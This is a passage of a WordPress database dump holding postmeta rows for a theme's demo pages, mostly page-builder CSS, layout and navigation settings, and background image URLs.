url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709800403{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709805475{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(702,706,'title',''),(703,706,'theme_skin','default'),(704,706,'theme_tone','night'),(705,706,'loader','dark'),(707,711,'_wp_page_template','template-onepager.php'),(708,711,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483452381{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709867477{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506189424{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773948538{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709900735{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709857066{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(709,711,'_wpb_vc_js_status','true'),(710,711,'_wpb_vc_js_interface_version','2'),(711,711,'slide_template','default'),(712,711,'page_layout','fullwidth'),(713,711,'page_sidebar','Default Sidebar'),(714,711,'page_width','content'),(715,711,'navbar_style','style2'),(716,711,'navbar_color','dark'),(717,711,'footer_color','default'),(718,711,'page_header','no-header'),(719,711,'page_subtitle',''),(720,711,'title',''),(721,711,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(722,711,'theme_skin','default'),(723,711,'theme_tone','default'),(724,711,'loader','dark'),(726,717,'_wp_page_template','template-onepager.php'),(727,717,'_wpb_shortcodes_custom_css','.vc_custom_1405429478670{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/slide4.jpg?id=545) !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483488171{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709939804{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506234346{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773959059{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709924097{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709931694{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(728,717,'_wpb_vc_js_status','true'),(729,717,'_wpb_vc_js_interface_version','2'),(730,717,'slide_template','default'),(731,717,'theme_skin','default'),(732,717,'theme_tone','default'),(733,717,'page_layout','fullwidth'),(734,717,'page_sidebar','Default Sidebar'),(735,717,'page_width','content'),(736,717,'navbar_style','style2'),(737,717,'navbar_color','dark'),(738,717,'footer_color','default'),(739,717,'page_header','no-header'),(740,717,'page_subtitle',''),(741,717,'title',''),(742,717,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(743,717,'loader','default'),(745,721,'_wpb_shortcodes_custom_css','.vc_custom_1405454957992{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483630935{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1408506278206{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506285668{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773973679{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709962068{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709968138{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(746,721,'_wp_page_template','template-onepager.php'),(747,721,'_wpb_vc_js_status','true'),(748,721,'_wpb_vc_js_interface_version','2'),(749,721,'slide_template','default'),(750,721,'theme_skin','default'),(751,721,'theme_tone','default'),(752,721,'page_layout','fullwidth'),(753,721,'page_sidebar','Default Sidebar'),(754,721,'page_width','fullwidth'),(755,721,'navbar_style','style3'),(756,721,'navbar_color','white'),(757,721,'footer_color','default'),(758,721,'page_header','no-header'),(759,721,'page_subtitle',''),(760,721,'title',''),(761,721,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(762,721,'loader','default'),(764,728,'_wp_page_template','template-onepager.php'),(765,728,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406710000236{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506326298{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1405452967628{padding-bottom: 70px !important;}.vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}.vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773992514{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405454385261{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405452676244{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i6.jpg?id=541) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709987402{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709992519{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(766,728,'_wpb_vc_js_status','true'),(767,728,'_wpb_vc_js_interface_version','2'),(768,728,'slide_template','default'),(769,728,'theme_skin','dark'),(770,728,'theme_tone','default'),(771,728,'page_layout','fullwidth'),(772,728,'page_sidebar','Default Sidebar'),(773,728,'page_width','content'),(774,728,'navbar_style','style2'),(775,728,'navbar_color','dark'),(776,728,'footer_color','dark'),(777,728,'page_header','no-header'),(778,728,'page_subtitle',''),(779,728,'title',''),(780,728,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(781,728,'loader','dark'),(783,745,'_wpb_shortcodes_custom_css','.vc_custom_1405453516277{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405454215519{padding-bottom: 50px !important;background-color: #202123 !important;border-color: #eeeeee !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406710059782{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506362110{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1405452967628{padding-bottom: 70px !important;}.vc_custom_1405454282439{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1d1e20 !important;}.vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409774002317{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405454247199{background-color: #202123 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405452676244{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i6.jpg?id=541) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406710045791{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406710051477{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(784,745,'_wp_page_template','template-onepager.php'),(785,745,'_wpb_vc_js_status','true'),(786,745,'_wpb_vc_js_interface_version','2'),(787,745,'slide_template','default'),(788,745,'theme_skin','night'),(789,745,'theme_tone','night'),(790,745,'page_layout','fullwidth'),(791,745,'page_sidebar','Default Sidebar'),(792,745,'page_width','fullwidth'),(793,745,'navbar_style','style2'),(794,745,'navbar_color','dark'),(795,745,'footer_color','dark'),(796,745,'page_header','no-header'),(797,745,'page_subtitle',''),(798,745,'title',''),(799,745,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(800,745,'loader','dark'),(802,753,'_wp_page_template','template-onepager.php'),(803,753,'_wpb_shortcodes_custom_css','.vc_custom_1405457897351{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406710087331{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506397651{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1405452967628{padding-bottom: 70px !important;}.vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}.vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409774017224{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405453002397{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405452676244{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i6.jpg?id=541) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406710070153{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406710078643{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(804,753,'_wpb_vc_js_status','true'),(805,753,'_wpb_vc_js_interface_version','2'),(806,753,'slide_template','default'),(807,753,'theme_skin','dark'),(808,753,'theme_tone','default'),(809,753,'page_layout','fullwidth'),(810,753,'page_sidebar','Default Sidebar'),(811,753,'page_width','fullwidth'),(812,753,'navbar_style','style2'),(813,753,'navbar_color','dark'),(814,753,'footer_color','dark'),(815,753,'page_header','no-header'),(816,753,'page_subtitle',''),(817,753,'title',''),(818,753,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(819,753,'loader','dark'),(821,761,'_wp_page_template','template-onepager.php'),(822,761,'_wpb_vc_js_status','true'),(823,761,'_wpb_vc_js_interface_version','2'),(824,761,'slide_template','default'),(825,761,'theme_skin','default'),(826,761,'theme_tone','default'),(827,761,'page_layout','fullwidth'),(828,761,'page_sidebar','Default Sidebar'),(829,761,'page_width','fullwidth'),(830,761,'navbar_style','style3'),(831,761,'navbar_color','white'),(832,761,'footer_color','dark'),(833,761,'page_header','no-header'),(834,761,'page_subtitle',''),(835,761,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(836,761,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483567360{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406710109493{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506433699{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409774028101{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1409241287891{margin-bottom: -30px !important;}.vc_custom_1409241343251{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1409240908382{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1409241349337{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(837,761,'title',''),(838,761,'loader','default'),(840,784,'_wpb_shortcodes_custom_css','.vc_custom_1405492388637{margin-bottom: 80px !important;padding-top: 25px !important;}'),(841,784,'_wpb_vc_js_status','true'),(842,784,'_wp_page_template','default'),(843,784,'_wpb_vc_js_interface_version','2'),(844,784,'slide_template','default'),(845,784,'theme_skin','default'),(846,784,'theme_tone','default'),(847,784,'page_layout','fullwidth'),(848,784,'page_sidebar','Default Sidebar'),(849,784,'page_width','fullwidth'),(850,784,'navbar_style','default'),(851,784,'navbar_color','default'),(852,784,'footer_color','dark'),(853,784,'page_header','default'),(854,784,'page_subtitle','Contrary to popular belief, Lorem Ipsum'),(855,784,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(856,818,'_wp_page_template','template-blog.php'),(857,818,'_wpb_shortcodes_custom_css','.vc_custom_1405464975290{background-color: #a5a5a5 !important;}'),(858,818,'_wpb_vc_js_status','true'),(859,818,'_wpb_vc_js_interface_version','2'),(860,818,'slide_template','default'),(861,818,'theme_skin','default'),(862,818,'theme_tone','default'),(863,818,'page_layout','sidebar_right'),(864,818,'page_sidebar','Default Sidebar'),(865,818,'page_width','content'),(866,818,'navbar_style','style2'),(867,818,'navbar_color','white'),(868,818,'footer_color','default'),(869,818,'page_header','no-header'),(870,818,'page_subtitle',''),(871,818,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(872,820,'_wp_page_template','template-blog.php'),(873,820,'_wpb_shortcodes_custom_css','.vc_custom_1405464975290{background-color: #a5a5a5 !important;}'),(874,820,'_wpb_vc_js_status','true'),(875,820,'_wpb_vc_js_interface_version','2'),(876,820,'slide_template','default'),(877,820,'theme_skin','default'),(878,820,'theme_tone','default'),(879,820,'page_layout','sidebar_left'),(880,820,'page_sidebar','Default Sidebar'),(881,820,'page_width','content'),(882,820,'navbar_style','style2'),(883,820,'navbar_color','white'),(884,820,'footer_color','default'),(885,820,'page_header','no-header'),(886,820,'page_subtitle',''),(887,820,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(888,978,'_wp_page_template','template-onepager.php'),(889,978,'_wpb_vc_js_status','true'),(890,978,'_wpb_vc_js_interface_version','2'),(891,978,'slide_template','default'),(892,978,'theme_skin','default'),(893,978,'theme_tone','default'),(894,978,'loader','default'),(895,978,'page_layout','fullwidth'),(896,978,'page_sidebar','Default Sidebar'),(897,978,'page_width','fullwidth'),(898,978,'navbar_style','style2'),(899,978,'navbar_color','dark'),(900,978,'footer_color','default'),(901,978,'page_header','no-header'),(902,978,'page_subtitle',''),(903,978,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(904,978,'_wpb_shortcodes_custom_css','.vc_custom_1410736550778{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/09/rain-bg.jpg?id=1039) !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759263341{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709770765{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709776984{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(905,978,'title',''),(1651,2120,'_wp_attached_file','2020/12/HPS_Color_Black-Text.png.png'),(909,271,'_thumbnail_id','558'),(910,271,'page_layout','sidebar_right'),(911,271,'page_width','content'),(912,271,'page_sidebar','Default Sidebar'),(913,271,'thumb_setting','on'),(914,271,'thumb_height','landscape'),(915,271,'thumb_lightbox','off'),(916,271,'gallery_type','lightbox'),(917,271,'slide_template','default'),(918,271,'footer_color','default'),(919,271,'navbar_color','default'),(920,271,'navbar_style','default'),(921,271,'gallery_images',''),(922,271,'video_site_url','http://vimeo.com/95749719'),(923,271,'page_type','default'),(924,271,'page_header','default'),(925,271,'page_subtitle','This is an example video blog post'),(1035,1932,'_wpb_shortcodes_custom_css','.vc_custom_1405457897351{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406710087331{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506397651{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1405452967628{padding-bottom: 70px !important;}.vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}.vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409774017224{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405453002397{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405452676244{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406710070153{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px 